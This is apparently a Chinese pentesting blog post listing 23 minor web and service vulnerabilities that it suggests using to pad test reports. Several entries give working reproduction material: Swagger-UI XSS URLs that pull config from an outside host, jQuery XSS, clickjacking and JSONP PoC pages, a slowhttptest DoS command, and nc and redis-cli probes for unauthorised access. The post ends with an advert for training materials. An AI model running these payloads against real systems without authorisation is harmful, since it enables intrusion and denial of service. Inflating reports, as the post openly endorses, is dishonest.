前言

网安牛马数载,蓦然回首,不过是些许风霜罢了…

遥想熊猫当年,面向WAF防护的渗透网站满眼惆怅,在当初内卷严重的牛马市场,如果你提交的渗透测试报告漏洞数量太少,再多借口也没用,只能被迫接受“菜鸡”称号,沦为测评、驻场的主要工作者,从此告别渗透、攻防…

所以当初熊猫为了脱离“菜鸡”称号可谓是煞费苦心,在测试有WAF防护的网站时,也会想办法凑出一堆中低危漏洞来充实报告内容,以证实工作量,便于划水…

那都有哪些漏洞可以用来凑数量呢?

WARN

****提前说明一下:本文章涉及漏洞可能过于无耻,渗透大佬请自行告退,网安牛马如羞于提交请酌情观看,熊猫原则是,既然叫漏洞,那为什么不提呢?节操?别闹,都干安全了还要什么节操呀

**愿兄弟们看完文章之后
**

**划水越来越多,挖洞越来越丝滑
**

注:本期不发逻辑漏洞,逻辑漏洞会单独再发一篇文章

1.Swagger-UI 反射型 XSS

漏洞场景:

发现网站存在Swagger-UI的入口页面swagger-ui.html。

漏洞复现:

需要提前构造一个配置文件test.json放到自己的服务器里面,如下所示:

{``"url": "https://jumpy-floor.surge.sh/test.yaml",``"urls": [`   `{`       `"url": "https://jumpy-floor.surge.sh/test.yaml",`       `"name": "Foo"`   `}``]``}

然后在Swagger-UI中使用?configUrl=和url参数复现XSS漏洞,加载的类型比如这样:

/swagger-ui.html?configUrl=https://jumpy-floor.surge.sh/test.json``/swagger-ui.html?url=https://jumpy-floor.surge.sh/test.json``/swagger-ui.html?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==

复现截图:

2.JQuery框架Dom型XSS

漏洞场景:

发现网站使用jQuery-js,并且版本与poc匹配。

漏洞复现:

poc中填写目标站点的JQueryjs地址,如图所示:

<!DOCTYPE html>``<!-- poc请自行复制,保存为html格式 -->``<html lang="zh">``<head>`    `<meta charset="UTF-8">`    `<meta name="viewport" content="width=device-width, initial-scale=1.0">`    `<meta http-equiv="X-UA-Compatible" content="ie=edge">`    `<title>Jquery XSS</title>`    `<script type="text/javascript" src="https://***.***.***/js/jquery-easyui-1.5.2/jquery.easyui.min.js"></script>`    `<!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.9.1/jquery.js"></script> -->`    `<!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.11.1/jquery.js"></script> -->`    `<!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.12.1/jquery.js"></script> -->`    `<script>`        `$(function () {`            `// #9521`            `// #11290`            `$(location.hash);``   `            `// #11974`            `$('#bug').on('click', function () {`                `$.parseHTML("<img src='z' onerror='alert(\"bug-11974\")'>");`                `return false;`            `});`        `})``</script>``</head>``   ``<body>`    `<h1>jQuery with XSS</h1>`    `<h2>Demo:</h2>`    `<p style="color:red;">Note: Source code changes jQuery version,As long as there is no bullet window, there will be no problem.!</p>`    `<ul>`        `<li><a href="#<img src=/ onerror=alert(1)>" target="_blank">bug-9521</a> => <a`                `href="https://bugs.jquery.com/ticket/9521" target="_blank">ticket</a></li>`        `<li><a href="#p[class='<img src=/ onerror=alert(2)>']" target="_blank">bug-11290</a> => <a`                `href="https://bugs.jquery.com/ticket/11290" target="_blank">ticket</a></li>`        `<li><a href="#11974" id="bug">bug-11974</a> => <a href="https://bugs.jquery.com/ticket/11974"`                `target="_blank">ticket</a></li>`    `</ul>`    `<h2>Test version:</h2>`    `<ul>`        `<li><a href="http://research.insecurelabs.org/jquery/test/" target="_blank">test result</a></li>`    `</ul>`    `<h2>Safe version:</h2>`    `<ul>`        `<li>1.12.0, 1.12.1 </li>`        `<li>2.2.0, 2.2.1</li>`        `<li>3.0.0, 3.0.1, 3.1.0, 3.1.1</li>`    `</ul>``</body>``   ``</html>

复现截图:

然后本地浏览器打开poc点击test result,弹窗则证明存在漏洞:

3.SSLv2 Drown攻击信息泄露漏洞

漏洞场景:

发现网站系统支持了SSLv2加密算法,且该算法被暴露存在Drown跨协议攻击TLS漏洞。

漏洞复现:

通过加密算法检测工具sslciphercheck,与网站系统进行加密算法枚举通信,探测系统存在的加密算法情况(工具下载链接如下)。

https://github.com/woanware/woanware.github.io/blob/master/downloads/sslciphercheck.v.1.4.2.zip``运行方式:sslciphercheck.exe -h ip(目标地址) -p 443

或者使用nmap输入如下命令:

nmap -sV -p 端口 --script ssl-enum-ciphers 目标ip

复现截图:

sslciphercheck显示如下则证明存在漏洞:

4.启用不安全的WebDAV模块

漏洞场景:

网站使用HTTP协议。

漏洞复现:

这个风险也叫不安全的HTTP方法,发现渗透网站是HTTP方法后,使用curl命令探测:

curl -I -X OPTIONS https://目标网站URL

复现截图:

5.易受Dos慢速攻击

漏洞场景:

网站为HTTP协议。

漏洞复现:

需要本地下载slowhttptest工具,然后使用命令验证即可:

项目地址:https://github.com/shekyan/slowhttptest``slowhttptest -c 65500 -B -i 10 -r 200 -s 8192 -t SLOWBODY -u https://xxxxxx

当显示为NO,则表示存在HTTP慢速攻击漏洞,可导致拒绝服务。

复现截图:

6.SSH支持弱加密算法风险

漏洞场景:

开放22端口。

漏洞复现:

使用nmap输入如下命令扫描:

nmap --script ssh2-enum-algos -sV -p 22 [IP]

查看扫描结果中的加密算法情况。

复现截图:

7.POODLE信息泄露漏洞

漏洞场景:

发现网站系统使用了SSLv3协议。

漏洞复现:

通过加密算法检测工具sslciphercheck,与网站系统进行加密算法枚举通信,探测系统存在的加密算法情况。

https://github.com/woanware/woanware.github.io/blob/master/downloads/sslciphercheck.v.1.4.2.zip``运行方式:sslciphercheck.exe -h ip(目标地址) -p 443

复现截图:

8.SSL重协商漏洞

漏洞场景:

莽怼。

漏洞复现:

通过加密算法检测工具sslciphercheck,与网站系统进行加密算法枚举通信,探测系统存在的加密算法情况。

https://github.com/woanware/woanware.github.io/blob/master/downloads/sslciphercheck.v.1.4.2.zip``运行方式:sslciphercheck.exe -h ip(目标地址) -p 443

复现截图:

9.HOST头部攻击

漏洞场景:

莽怼。

漏洞复现:

通常awvs可能会扫到,扫不到就是抓包之后改host即可,很简单。

复现截图:

10.点击劫持漏洞

漏洞场景:

莽怼。

漏洞复现:

通过替换poc中的URL,本地浏览器打开html查看是否被iframe标签嵌套。

<html>``<head>``<title>Clickjacking</title>``</head>``<body>``<iframe src="https://test.com/" width="500" height="500" />``</iframe>

复现截图:

11.前端js.map文件暴露导致vue代码泄露

漏洞场景:

扫描发现有.map文件。

漏洞复现:

下载.map文件后,使用reverse-sourcemap还原vue代码。

使用npm安装reverse-souecemap,命令如下:

npm install reverse-sourcemap -g``reverse-sourcemap -o /存放逆向出源码的目录 -v /.map文件所在的目录

下载.map文件后,使用reverse-sourcemap还原vue代码。

复现截图:

12.httpOnly Cookie信息泄露

漏洞场景:

Apache解析。

漏洞复现:

通过Burpsuite抓包对参数注入超长字节,使用户的cookie大于4k。

复现截图:

返回报错页面泄露用户Cookie信息。

13.未设置cookie的httponly属性

漏洞场景:

莽怼。

漏洞复现:

通过浏览器控制台输入如下命令,弹窗及存在风险。

javascript:alert(document.cookie)

复现截图:

14.域名防护设置缺失

漏洞场景:

莽怼。

漏洞复现:

浏览器访问如下测试地址输入目标URL。

http://whois.chinaz.com/caimipai.com

复现截图:

15.会话登出失效

漏洞场景:

莽怼。

漏洞复现:

通过手动点击注销登录之后使用注销的token继续尝试增删改查。

复现截图:

16.JsonP劫持漏洞

漏洞场景:

莽怼。

漏洞复现:

将URL填入POC,浏览器打开html,弹窗则证明漏洞存在。

<html>`  `<body>``<script> function wooyun_callback(a){  alert(a);  }  </script>`  `<script src="http://www.test.com/login.php?callback=wooyun_callback">``</script>  ``  </body>``</html>

复现截图:

17.CORS

漏洞场景:

基本Xray、AWVS都会扫出来。

漏洞复现:

直接上扫描。

复现截图:

18.Memcached 未授权访问漏洞

漏洞场景:

开放端口:11211。

漏洞复现:

nmap直接上扫描。

nmap -sV -p 11211 --script=memcached-info 目标ip

复现截图:

19.ZooKeeper 未授权访问

漏洞场景:

开放端口:2181。

漏洞复现:

直接上kali。

echo envi | nc 目标ip 2181

复现截图:

20.NFS未授权访问

漏洞场景:

开放端口:2049 (默认)。

漏洞复现:

直接上kali。

showmount -e IP

复现截图:

21.Redis未授权访问

漏洞场景:

开放端口:6379。

漏洞复现:

直接上kali。

redis-cli -h IP -p port

复现截图:

22.Webpack源码泄露

漏洞场景:

莽怼。

漏洞复现:

浏览器开发者模式看见Webpack提就完事了。

复现截图:

23.OSS存储漏洞

漏洞场景:

有存储桶文件访问。

漏洞复现:

直接看,当敏感文件上传到公开空间,则任何知道URL链接的人都能访问。

复现截图:

总结

除以上漏洞外,其实还有好多类似的漏洞,比如明文传输核心业务数据、多点认证缺陷、弱加密风险、IIS段文件名漏洞、证书失效、各种信息泄露…

这些大家都知道的熊猫就不写了,关键就是看大家愿不愿意。

黑客/网络安全学习路线

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

网络安全学习资源分享:

下面给大家分享一份2025最新版的网络安全学习路线资料,帮助新人小白更系统、更快速的学习黑客技术!

一、2025最新网络安全学习路线

一个明确的学习路线可以帮助新人了解从哪里开始,按照什么顺序学习,以及需要掌握哪些知识点。

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)

我们把学习路线分成L1到L4四个阶段,一步步带你从入门到进阶,从理论到实战。

在这里插入图片描述

L1级别:网络安全的基础入门

L1阶段:我们会去了解计算机网络的基础知识,以及网络安全在行业的应用和分析;学习理解安全基础的核心原理,关键技术,以及PHP编程基础;通过证书考试,可以获得NISP/CISP。可就业安全运维工程师、等保测评工程师。

在这里插入图片描述

L2级别:网络安全的技术进阶

L2阶段我们会去学习渗透测试:包括情报收集、弱口令与口令爆破以及各大类型漏洞,还有漏洞挖掘和安全检查项目,可参加CISP-PTE证书考试。

在这里插入图片描述

L3级别:网络安全的高阶提升

L3阶段:我们会去学习反序列漏洞、RCE漏洞,也会学习到内网渗透实战、靶场实战和技术提取技术,系统学习Python编程和实战。参加CISP-PTE考试。

在这里插入图片描述

L4级别:网络安全的项目实战

L4阶段:我们会更加深入进行实战训练,包括代码审计、应急响应、红蓝对抗以及SRC的挖掘技术。并学习CTF夺旗赛的要点和刷题

在这里插入图片描述

整个网络安全学习路线L1主要是对计算机网络安全的理论基础的一个学习掌握;而L3 L4更多的是通过项目实战来掌握核心技术,针对以上网安的学习路线我们也整理了对应的学习视频教程,和配套的学习资料。

二、技术文档和经典PDF书籍

书籍和学习文档资料是学习网络安全过程中必不可少的,我自己整理技术文档,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,(书籍含电子版PDF)

在这里插入图片描述

三、网络安全视频教程

对于很多自学或者没有基础的同学来说,书籍这些纯文字类的学习教材会觉得比较晦涩难以理解,因此,我们提供了丰富的网安视频教程,以动态、形象的方式展示技术概念,帮助你更快、更轻松地掌握核心知识

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

在这里插入图片描述

四、网络安全护网行动/CTF比赛

学以致用 ,当你的理论知识积累到一定程度,就需要通过项目实战,在实际操作中检验和巩固你所学到的知识,同时为你找工作和职业发展打下坚实的基础。

在这里插入图片描述

五、网络安全工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。在这里插入图片描述

面试不仅是技术的较量,更需要充分的准备。

在你已经掌握了技术之后,就需要开始准备面试,我们将提供精心整理的网安面试题库,涵盖当前面试中可能遇到的各种技术问题,让你在面试中游刃有余。

如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

img

**读者福利 |** CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)

Logo

开源鸿蒙跨平台开发社区汇聚开发者与厂商,共建“一次开发,多端部署”的开源生态,致力于降低跨端开发门槛,推动万物智联创新。

更多推荐